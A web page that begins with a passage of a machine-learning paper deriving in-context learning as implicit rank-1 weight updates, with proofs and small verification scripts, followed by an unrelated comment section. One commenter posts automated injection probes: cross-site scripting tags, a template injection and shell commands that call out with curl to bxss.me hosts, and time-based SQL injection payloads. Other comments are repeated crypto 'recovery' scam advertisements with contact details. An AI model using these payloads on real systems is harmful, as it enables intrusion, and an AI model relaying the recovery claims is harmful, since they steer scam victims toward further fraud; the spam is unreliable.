$\mathcal{D}^{\,i}_{FT} = \begin{pmatrix} x_{1} & x_{2} & \cdots & x_{i} \\ \langle \omega_{\mathrm{test}}, x_{1} \rangle & \langle \omega_{\mathrm{test}}, x_{2} \rangle & \cdots & \langle \omega_{\mathrm{test}}, x_{i} \rangle \end{pmatrix}$

We initialize the transformer with the pre-trained weights and then fine-tune it with stochastic gradient descent (learning rate 0.01), feeding one example at a time in the same order in which the examples are processed in context. During fine-tuning we update only the weight matrix of the MLP layer. Thus, for each i=1,…,M we perform i gradient descent steps with batch size 1. After fine-tuning on all the examples, we compute the loss of the fine-tuned model on the test query $(x_{\text{test}},0)$. We call this the "GD test loss after i steps".

Figure 2: Convergence of (ΔW)_i. As more of the context is processed, the relative change in the weights goes to zero. For context length i>2, the plot shows the mean difference $\left\|\, (\Delta W)_{i+1} - (\Delta W)_i \,\right\|_{2}$ and the standard error over 100 independent runs.

Similarly, for each i we compute the weight transfer defined in equation (8), using the context

$C_i = \begin{pmatrix} x_{1} & x_{2} & \cdots & x_{i} \\ \langle \omega_{\mathrm{test}}, x_{1} \rangle & \langle \omega_{\mathrm{test}}, x_{2} \rangle & \cdots & \langle \omega_{\mathrm{test}}, x_{i} \rangle \end{pmatrix}$

and the same test query $x=(x_{\text{test}},0)$. Using ΔW from the weight-transfer formula, we compute the loss on $(x_{\text{test}},0)$. We call this the "ΔW test loss" for context length i.

In Figure 3 below we plot the fine-tuning GD test loss against the weight-transfer test loss. The plot shows the mean over 100 independent runs. Although the two differ, both learning processes (fine-tuning and the implicit weight-update dynamics) reduce the loss in a similar way.

5. Conclusion and limitations

Our approach to the transformer-block mechanics underlying ICL improves on previous work in that it places no restriction on the architecture of the self-attention layer in order to extract an implicit learning dynamics in weight space. Earlier theoretical work on the internals of transformers derived such implicit dynamics only under strong assumptions on the self-attention layer (for example linear attention and/or a single head; see [9–11, 19]). In fact, our results remain valid if the self-attention layer is replaced by other forms of contextual layers, such as an RNN layer or any layer that takes an input and, optionally, a context. This is surprising, because our analysis suggests that ICL has less to do with the internals of self-attention and more to do with the fact that ordinary neural networks can transfer modifications of their input space into their weight structure. This deep property has been noted in several theoretical works and helps explain why deep neural networks generalize so well [23–25].

However, although our approach is closer to reality because it removes the restrictions on the self-attention layer, we still analyze a simplified model in the following sense, which constitutes the main limitation of our analysis:

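Figure 3: Fine-tuning GD test loss compared with the ΔW (weight-transfer) test loss, averaged over 100 independent runs.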

Our derivation holds only for a single transformer block, because the main theorem quantifies the effect of the context only on the output for the last input token, not on the full output of the transformer block.
Our main theorem analyzes the effect of the context only with respect to the first generated token. It does not capture the full mechanics of generation beyond that step.

Despite these limitations, we hope this work helps to better understand the mysterious phenomena that emerge at inference time in LLMs.

A. Contextual blocks with skip-connections

We now consider contextual blocks with skip-connections, which cover the standard Pre-LN transformer block as described, for example, in [26].

Definition A.1. A contextual block with skip-connection is a layer of the form

$T(C,x) = x + A(C,x) + W'\, g_{\theta}\!\big(W\,A(C,x) + b\big) + b' \tag{22}$

where g_θ is any differentiable model and A(C,x) is a contextual layer.

We can generalize Theorem 2.2 to this setting by allowing updates not only of the first-layer weight matrix W but also of the bias b' of the last layer.

Theorem A.2. Consider a contextual block with skip-connection as above, that is,

$T(C,x) = x + A(C,x) + W'\, g_{\theta}\!\big(WA(C,x) + b\big) + b' \tag{23}$

Let A be a contextual layer and g_θ any differentiable model. Then the effect of a portion Y⊂C of the context on the output of the contextual block implicitly corresponds to a rank-1 weight update of the first-layer matrix, W(Y)=W+ΔW(Y), together with an update of the last-layer bias, $b'(Y) = b' + \Delta b'(Y)$, such that

$T_{W,\,b'}(C,x) = T_{\,W(Y),\,b'(Y)}\!\bigl(C\setminus Y,\, x\bigr), \tag{24}$

The parameter updates are given by

$\Delta b'(Y) = \Delta A(Y), \tag{25}$ $\Delta W(Y) = \frac{(W\,\Delta A(Y))\,A(C\setminus Y, x)^{T}} {\lVert A(C\setminus Y, x)\rVert^{2}}, \tag{26}$

where $\Delta A(Y) = A(C,x) - A(C\setminus Y, x)$ is the context vector associated with Y. Note that ΔW(Y) has rank 1, since WΔA(Y) is a column vector and $A(C\setminus Y, x)^{T}$ is a row vector.

Proof. The result follows from a direct computation. In the notation above we have, by definition,

$T_{W(Y),\,b'(Y)}\!\bigl(C\setminus Y, x\bigr) = x + A(C\setminus Y, x) + W'\, g_{\theta}\!\left(\,(W+\Delta W(Y))\,A(C\setminus Y, x) + b\right) + b' + \Delta b'(Y)$ $=\, x + A(C\setminus Y, x) + \Delta b'(Y)$ $+\, W' \, g_{\theta}\!\big( W\,A(C\setminus Y, x) + \Delta W(Y)\,A(C\setminus Y, x) + b \big) + b'$

Substituting ΔW(Y) from its definition and using $\frac{z^{T}}{\lVert z\rVert^{2}}\, z = 1$, we obtain

$\Delta W(Y)\,A(C\setminus Y, x) = \frac{(W\,\Delta A(Y))\,A(C\setminus Y, x)^{T}}{\lVert A(C\setminus Y, x)\rVert^{2}}\,A(C\setminus Y, x) = W\,\Delta A(Y).$

Hence, using also $\Delta b'(Y) = \Delta A(Y)$ from (25), we obtain

$T_{W(Y),\,b'(Y)}\!\bigl(C\setminus Y, x\bigr) = x + A(C\setminus Y, x) + \Delta A(Y) + W'\, g_{\theta}\!\left( W\big(A(C\setminus Y, x)+\Delta A(Y)\big) + b \right) + b'$

Since $A(C\setminus Y, x) + \Delta A(Y) = A(C, x)$ by the definition of the context vector, we finally have

$T_{W(Y),\,b'(Y)}\!\bigl(C\setminus Y, x\bigr) = x + A(C,x) + W'\, g_{\theta}\!\big(WA(C,x) + b\big) + b' = T_{W,\,b'}(C,x)$

which completes the proof.
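The identity of Theorem A.2 can be checked numerically. The sketch below is only an illustration under stated assumptions: the contextual layer `attention` is a toy single-head softmax attention with identity projections, $g_{\theta}$ is taken to be an elementwise `tanh`, and all sizes, seeds, and helper names (`rand_vec`, `rand_mat`, `matvec`, `block`) are hypothetical choices, not taken from the paper.

```python
import math
import random

random.seed(0)
d, width = 4, 6  # token dimension and hidden width (arbitrary choices)

def rand_vec(n):
    return [random.gauss(0.0, 1.0) for _ in range(n)]

def rand_mat(rows, cols):
    return [rand_vec(cols) for _ in range(rows)]

def matvec(M, v):
    return [sum(m * u for m, u in zip(row, v)) for row in M]

def attention(context, x):
    """Toy contextual layer A(C, x): query x attends over the tokens C + [x]."""
    tokens = context + [x]
    scores = [sum(a * b for a, b in zip(x, t)) for t in tokens]
    top = max(scores)
    weights = [math.exp(s - top) for s in scores]
    total = sum(weights)
    return [sum(w * t[k] for w, t in zip(weights, tokens)) / total
            for k in range(len(x))]

def block(W, b, W2, b2, context, x):
    """T(C, x) = x + A(C, x) + W' g(W A(C, x) + b) + b', assuming g = tanh."""
    a = attention(context, x)
    hidden = [math.tanh(u + v) for u, v in zip(matvec(W, a), b)]
    mlp = matvec(W2, hidden)
    return [xi + ai + mi + ci for xi, ai, mi, ci in zip(x, a, mlp, b2)]

W, b = rand_mat(width, d), rand_vec(width)
W2, b2 = rand_mat(d, width), rand_vec(d)
C = [rand_vec(d) for _ in range(5)]
x = rand_vec(d)
Y, C_rest = C[:2], C[2:]  # Y: the part of the context to absorb into the weights

a_rest = attention(C_rest, x)                               # A(C \ Y, x)
delta_a = [f - r for f, r in zip(attention(C, x), a_rest)]  # Delta A(Y)
w_delta = matvec(W, delta_a)                                # W Delta A(Y)
norm2 = sum(r * r for r in a_rest)

# Rank-1 update of W as in (26) and bias update of b' as in (25).
W_new = [[W[i][j] + w_delta[i] * a_rest[j] / norm2 for j in range(d)]
         for i in range(width)]
b2_new = [p + q for p, q in zip(b2, delta_a)]

full = block(W, b, W2, b2, C, x)                  # T_{W, b'}(C, x)
patched = block(W_new, b, W2, b2_new, C_rest, x)  # T_{W(Y), b'(Y)}(C \ Y, x)
max_diff = max(abs(p - q) for p, q in zip(full, patched))
print("max abs difference:", max_diff)
```

The printed difference should sit at the level of floating-point rounding, because the rank-1 term restores $W\,A(C,x)$ inside $g_{\theta}$ while the bias update restores the skip term $A(C,x)$.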

Note that the bias update $\Delta b'(Y)$ is similar in spirit to the function vectors of [27], the transcoder outputs of [28], or the latent concept representations of [29], which are used to edit transformer weights. Note also that this theorem applies not only to contextual layers of the Pre-LN transformer-block type, as in [26], but also to other kinds of contextual layers, for example those in the Griffin recurrent models with local attention [21].

B. An alternative implicit learning dynamics of ICL

In this section we describe an alternative implicit learning dynamics, obtained by applying Theorem 2.2 iteratively. It reveals an implicit weight-update dynamics induced by the contribution of each context token to the output of the contextual block. This means that while the transformer block generates the first response token, no explicit weight update is performed; nevertheless, the actual output is equivalent to the output of the same contextual block without context, for which an implicit learning dynamics has taken place in weight space. We describe this dynamics below. Namely, starting from the initial weight matrix $W_0$ of the first dense layer of the neural network $M_{W_0}$:

$T_{W_{0}}(c_{1},\ldots,c_{n},x) = T_{\,W_{0}+\Delta W_{0}(c_{1})}(c_{2},\ldots,c_{n},x) \tag{27}$

which gives the first weight update, corresponding to the effect of the token $c_1$ on the first-layer weight matrix:

$W_{1} = W_{0} + \frac{\bigl(W_{0}\,\Delta A(c_{1})\bigr)\,A(c_{2},\ldots,c_{n},x)^{T}} {\lVert A(c_{2},\ldots,c_{n},x)\rVert^{2}} \tag{28}$

Continuing this process iteratively, we obtain the next weight update, corresponding to the absorption of the second token:

$T_{W_{1}}(c_{2},\ldots,c_{n},x) = T_{\,W_{1}+\Delta W_{1}(c_{2})}(c_{3},\ldots,c_{n},x) \tag{29}$

which yields

$W_{2} = W_{1} + \frac{\bigl(W_{1}\,\Delta A(c_{2})\bigr)\,A(c_{3},\ldots,c_{n},x)^{T}} {\lVert A(c_{3},\ldots,c_{n},x)\rVert^{2}} \tag{30}$

The iterative process of implicit weight updates, one for each successive token, can therefore be summarized as follows.

Corollary B.0.1. In the notation above, the iterative process of weight updates has the form

$W_{i} = W_{i-1} + \frac{\bigl(W_{i-1}\,\Delta A(c_{i})\bigr)\,A(c_{i+1},\ldots,c_{n},x)^{T}} {\lVert A(c_{i+1},\ldots,c_{n},x)\rVert^{2}} \tag{31}$

which, starting from the initial weights $W_0$ of the first dense layer, models the transfer of information from the prompt token $c_i$ into the weights of the contextual block. In other words, the following holds:

$T_{W_{i}}(c_{i+1},\ldots,c_{n},x) = T_{W_{0}}(c_{1},\ldots,c_{n},x), \tag{32}$

for all $i = 1,\ldots,n$, where $\Delta A(c_{i}) = A(c_{i},\ldots,c_{n},x) - A(c_{i+1},\ldots,c_{n},x).$
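The invariant (32) can be illustrated with a short numerical sketch. Everything specific here is an assumption made for illustration: the block has no skip connection and is modelled as $W'\tanh(W\,A(C,x) + b)$, the contextual layer `attention` is a toy softmax attention with identity projections, and the sizes, seed, and helper names are hypothetical.

```python
import math
import random

random.seed(1)
d, width, n = 3, 5, 4  # token dimension, hidden width, number of context tokens

def rand_vec(k):
    return [random.gauss(0.0, 1.0) for _ in range(k)]

def matvec(M, v):
    return [sum(m * u for m, u in zip(row, v)) for row in M]

def attention(context, x):
    """Toy contextual layer A(C, x): query x attends over the tokens C + [x]."""
    tokens = context + [x]
    scores = [sum(a * b for a, b in zip(x, t)) for t in tokens]
    top = max(scores)
    weights = [math.exp(s - top) for s in scores]
    total = sum(weights)
    return [sum(w * t[k] for w, t in zip(weights, tokens)) / total
            for k in range(len(x))]

def block(W, b, W2, context, x):
    """T_W(C, x) = W' tanh(W A(C, x) + b); tanh is an assumed choice of model."""
    a = attention(context, x)
    return matvec(W2, [math.tanh(u + v) for u, v in zip(matvec(W, a), b)])

W0 = [rand_vec(d) for _ in range(width)]
b = rand_vec(width)
W2 = [rand_vec(width) for _ in range(d)]
context = [rand_vec(d) for _ in range(n)]  # c_1, ..., c_n
x = rand_vec(d)

target = block(W0, b, W2, context, x)      # T_{W_0}(c_1, ..., c_n, x)

W = W0
errors = []
for i in range(n):
    rest = context[i + 1:]                 # c_{i+1}, ..., c_n (empty at the end)
    a_rest = attention(rest, x)
    a_with = attention(context[i:], x)
    delta_a = [p - q for p, q in zip(a_with, a_rest)]  # Delta A(c_i)
    w_delta = matvec(W, delta_a)                       # W_{i-1} Delta A(c_i)
    norm2 = sum(v * v for v in a_rest)
    # Update (31): absorb token c_i into the first-layer weights.
    W = [[W[r][c] + w_delta[r] * a_rest[c] / norm2 for c in range(d)]
         for r in range(width)]
    out = block(W, b, W2, rest, x)         # T_{W_i}(c_{i+1}, ..., c_n, x)
    errors.append(max(abs(p - q) for p, q in zip(out, target)))

print("per-step deviation from T_{W_0}(c_1..c_n, x):", errors)
```

Each entry of `errors` compares the block with updated weights on the shortened context against the original output on the full context; in this toy setting all entries should be at rounding level, including the last step, where the context is empty.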

Note that $\Delta A(c_i)$ measures the contribution of the context token $c_i$ to the output of the contextual block. If $c_i$ has no effect on the output (that is, $\Delta A(c_i) = 0$), the corresponding update vanishes. Note also that the weight update at step $i$ is linear in the weights; namely, it can be rewritten as

$W_i = W_{i-1} + h_i\, W_{i-1} A_i = W_{i-1}\bigl(1 + h_i A_i\bigr) \quad\text{where}\quad A_i := \Delta A(c_i)\, A(c_{i+1},\ldots,c_n,x)^{T}, \tag{33}$

with the adaptive learning rate

$h_i:=\frac{1}{\lVert A(c_{i+1},\ldots,c_n,x)\rVert^{2}} \tag{34}$

In particular, this yields a factorization formula for the full implicit weight matrix corresponding to the effect of the context $[c_1,\ldots,c_n]$ on the input token $x$:

$W_{n} = W_{0}\,(1 + h_{1}A_{1})(1 + h_{2}A_{2})\cdots(1 + h_{n}A_{n}). \tag{35}$
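As a sanity check of the factorization (35), the sketch below builds $W_n$ in two ways: by the step-by-step update (31) and by right-multiplying $W_0$ with the factors $1 + h_i A_i$, where $1$ is read as the identity matrix. The toy softmax `attention` layer, the sizes, the seed, and the helper names are assumptions made only for this illustration.

```python
import math
import random

random.seed(2)
d, width, n = 3, 4, 5  # token dimension, hidden width, number of context tokens

def rand_vec(k):
    return [random.gauss(0.0, 1.0) for _ in range(k)]

def matvec(M, v):
    return [sum(m * u for m, u in zip(row, v)) for row in M]

def matmul(P, Q):
    return [[sum(P[i][k] * Q[k][j] for k in range(len(Q)))
             for j in range(len(Q[0]))] for i in range(len(P))]

def attention(context, x):
    """Toy contextual layer A(C, x): query x attends over the tokens C + [x]."""
    tokens = context + [x]
    scores = [sum(a * b for a, b in zip(x, t)) for t in tokens]
    top = max(scores)
    weights = [math.exp(s - top) for s in scores]
    total = sum(weights)
    return [sum(w * t[k] for w, t in zip(weights, tokens)) / total
            for k in range(len(x))]

W0 = [rand_vec(d) for _ in range(width)]
context = [rand_vec(d) for _ in range(n)]  # c_1, ..., c_n
x = rand_vec(d)

W_iter = W0
factors = []
for i in range(n):
    a_rest = attention(context[i + 1:], x)             # A(c_{i+1}, ..., c_n, x)
    a_with = attention(context[i:], x)                 # A(c_i, ..., c_n, x)
    delta_a = [p - q for p, q in zip(a_with, a_rest)]  # Delta A(c_i)
    h_i = 1.0 / sum(v * v for v in a_rest)             # adaptive step size (34)
    # Factor I + h_i A_i with A_i = Delta A(c_i) A(c_{i+1}, ..., c_n, x)^T.
    factors.append([[(1.0 if r == c else 0.0) + h_i * delta_a[r] * a_rest[c]
                     for c in range(d)] for r in range(d)])
    # Direct form of update (31).
    w_delta = matvec(W_iter, delta_a)
    W_iter = [[W_iter[r][c] + h_i * w_delta[r] * a_rest[c] for c in range(d)]
              for r in range(width)]

# Product form (35): W_n = W_0 (I + h_1 A_1) ... (I + h_n A_n).
W_prod = W0
for factor in factors:
    W_prod = matmul(W_prod, factor)

max_gap = max(abs(W_iter[r][c] - W_prod[r][c])
              for r in range(width) for c in range(d))
scale = max(1.0, max(abs(v) for row in W_iter for v in row))
rel_gap = max_gap / scale
print("relative gap between iterative and product forms:", rel_gap)
```

The factors are applied on the right in token order, matching (35); since the matrices $A_i$ need not commute, the order of the product matters in general.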

Date: 25 Sep 2025

09.10.25 08:11 pHqghUme

can I ask you a question please?
09.10.25 08:12 pHqghUme

can I ask you a question please?
09.10.25 08:12 pHqghUme

can I ask you a question please?
09.10.25 08:12 pHqghUme

is it ok if I upload an image?
09.10.25 08:13 pHqghUme

can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>
09.10.25 08:13 pHqghUme

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}
09.10.25 08:13 pHqghUme

'"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>
09.10.25 08:13 pHqghUme

can I ask you a question please?9425407
09.10.25 08:13 pHqghUme

is it ok if I upload an image?
09.10.25 08:14 pHqghUme

is it ok if I upload an image?
09.10.25 08:16 pHqghUme

e
09.10.25 08:17 pHqghUme

e
09.10.25 08:17 pHqghUme

e
09.10.25 08:17 pHqghUme

"+response.write(9043995*9352716)+"
09.10.25 08:17 pHqghUme

can I ask you a question please?
09.10.25 08:17 pHqghUme

can I ask you a question please?
09.10.25 08:17 pHqghUme

can I ask you a question please?
09.10.25 08:18 pHqghUme

can I ask you a question please?
09.10.25 08:18 pHqghUme

$(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)
09.10.25 08:18 pHqghUme

is it ok if I upload an image?
09.10.25 08:18 pHqghUme

is it ok if I upload an image?
09.10.25 08:18 pHqghUme

|(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)
09.10.25 08:18 pHqghUme

|(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)
09.10.25 08:18 pHqghUme

is it ok if I upload an image?
09.10.25 08:19 pHqghUme

is it ok if I upload an image?
09.10.25 08:20 pHqghUme

e
09.10.25 08:20 pHqghUme

e
09.10.25 08:21 pHqghUme

e
09.10.25 08:21 pHqghUme

e
09.10.25 08:21 pHqghUme

can I ask you a question please?
09.10.25 08:22 pHqghUme

can I ask you a question please?
09.10.25 08:22 pHqghUme

can I ask you a question please?
09.10.25 08:22 pHqghUme

is it ok if I upload an image?
09.10.25 08:22 pHqghUme

if(now()=sysdate(),sleep(15),0)
09.10.25 08:22 pHqghUme

can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
09.10.25 08:23 pHqghUme

can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
09.10.25 08:23 pHqghUme

can I ask you a question please?
09.10.25 08:23 pHqghUme

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
09.10.25 08:24 pHqghUme

is it ok if I upload an image?
09.10.25 08:24 pHqghUme

e
09.10.25 08:24 pHqghUme

can I ask you a question please?-1 waitfor delay '0:0:15' --
09.10.25 08:25 pHqghUme

is it ok if I upload an image?
09.10.25 08:25 pHqghUme

e
09.10.25 08:25 pHqghUme

e
09.10.25 08:25 pHqghUme

e
09.10.25 08:25 pHqghUme

can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --
09.10.25 08:26 pHqghUme

can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--
09.10.25 08:26 pHqghUme

e
09.10.25 08:27 pHqghUme

can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--
09.10.25 08:27 pHqghUme

can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--
09.10.25 08:28 pHqghUme

can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
09.10.25 08:28 pHqghUme

can I ask you a question please?'"
09.10.25 08:28 pHqghUme

can I ask you a question please?
09.10.25 08:28 pHqghUme

@@olQP6
09.10.25 08:28 pHqghUme

(select 198766*667891 from DUAL)
09.10.25 08:28 pHqghUme

(select 198766*667891)
09.10.25 08:30 pHqghUme

is it ok if I upload an image?
09.10.25 08:33 pHqghUme

can I ask you a question please?
09.10.25 08:34 pHqghUme

can I ask you a question please?
09.10.25 08:34 pHqghUme

if(now()=sysdate(),sleep(15),0)
09.10.25 08:35 pHqghUme

e
09.10.25 08:36 pHqghUme

is it ok if I upload an image?
09.10.25 08:36 pHqghUme

is it ok if I upload an image?
09.10.25 08:37 pHqghUme

is it ok if I upload an image?
09.10.25 08:37 pHqghUme

is it ok if I upload an image?
09.10.25 08:37 pHqghUme

e
09.10.25 08:37 pHqghUme

e
09.10.25 08:40 pHqghUme

can I ask you a question please?
09.10.25 08:40 pHqghUme

is it ok if I upload an image?
09.10.25 08:41 pHqghUme

e
09.10.25 08:41 pHqghUme

can I ask you a question please?
09.10.25 08:42 pHqghUme

can I ask you a question please?
09.10.25 08:42 pHqghUme

is it ok if I upload an image?
09.10.25 08:42 pHqghUme

e
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
11.10.25 04:41 luciajessy3

Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…
11.10.25 10:44 Tonerdomark

A thief took my Dogecoin and wrecked my life. Then Mr. Sylvester stepped in and changed everything. He got back €211,000 for me, every single cent of my gains. His calm confidence and strong tech skills rebuilt my trust. Thanks to him, I recovered my cash with no issues. After months of stress, I felt huge relief. I had full faith in him. If a scam stole your money, reach out to him today at { yt7cracker@gmail . com } His help sparked my full turnaround.
12.10.25 01:12 harristhomas7376

"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
12.10.25 01:12 harristhomas7376

"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
12.10.25 19:53 Tonerdomark

A crook swiped my Dogecoin. It ruined my whole world. Then Mr. Sylvester showed up. He fixed it all. He pulled back €211,000 for me. Not one cent missing from my profits. His steady cool and sharp tech know-how won back my trust. I got my money smooth and sound. After endless worry, relief hit me hard. I trusted him completely. Lost cash to a scam? Hit him up now at { yt7cracker@gmail . com }. His aid turned my life around. WhatsApp at +1 512 577 7957.
12.10.25 21:36 blessing

Writing this review is a joy. Marie has provided excellent service ever since I started working with her in early 2018. I was worried I wouldn't be able to get my coins back after they were stolen by hackers. I had no idea where to begin, therefore it was a nightmare for me. However, things became easier for me after my friend sent me to [email protected] and +1 7127594675 on WhatsApp. I'm happy that she was able to retrieve my bitcoin so that I could resume trading.
13.10.25 01:11 elizabethrush89

God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1
13.10.25 01:11 elizabethrush89

God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1
14.10.25 01:15 tyleradams

